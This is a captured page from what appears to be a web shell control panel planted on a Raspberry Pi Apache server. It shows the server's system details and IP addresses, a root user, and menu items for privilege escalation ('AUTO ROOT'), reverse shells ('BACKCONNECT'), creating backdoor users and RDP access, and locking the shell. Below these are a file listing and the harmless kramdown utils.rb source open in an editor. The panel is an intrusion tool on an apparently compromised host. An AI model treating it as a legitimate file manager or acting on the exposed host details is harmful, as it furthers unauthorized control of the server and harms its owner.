Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib /
ruby /
vendor_ruby /
kramdown /
[ HOME SHELL ]
Name
Size
Permission
Action
converter
[ DIR ]
drwxr-xr-x
parser
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
converter.rb
2.48
KB
-rw-r--r--
document.rb
4.89
KB
-rw-r--r--
element.rb
15.44
KB
-rw-r--r--
error.rb
388
B
-rw-r--r--
options.rb
21.3
KB
-rw-r--r--
parser.rb
736
B
-rw-r--r--
utils.rb
1.25
KB
-rw-r--r--
version.rb
233
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : utils.rb
# -*- coding: utf-8 -*- # #-- # Copyright (C) 2009-2016 Thomas Leitner <t_leitner@gmx.at> # # This file is part of kramdown which is licensed under the MIT. #++ # module Kramdown # == \Utils Module # # This module contains utility class/modules/methods that can be used by both parsers and # converters. module Utils autoload :Entities, 'kramdown/utils/entities' autoload :Html, 'kramdown/utils/html' autoload :OrderedHash, 'kramdown/utils/ordered_hash' autoload :Unidecoder, 'kramdown/utils/unidecoder' autoload :StringScanner, 'kramdown/utils/string_scanner' autoload :Configurable, 'kramdown/utils/configurable' autoload :LRUCache, 'kramdown/utils/lru_cache' # Treat +name+ as if it were snake cased (e.g. snake_case) and camelize it (e.g. SnakeCase). def self.camelize(name) name.split('_').inject('') {|s,x| s << x[0..0].upcase << x[1..-1] } end # Treat +name+ as if it were camelized (e.g. CamelizedName) and snake-case it (e.g. camelized_name). def self.snake_case(name) name = name.dup name.gsub!(/([A-Z]+)([A-Z][a-z])/,'\1_\2') name.gsub!(/([a-z])([A-Z])/,'\1_\2') name.downcase! name end def self.deep_const_get(str) ::Object.const_get(str) end end end
Close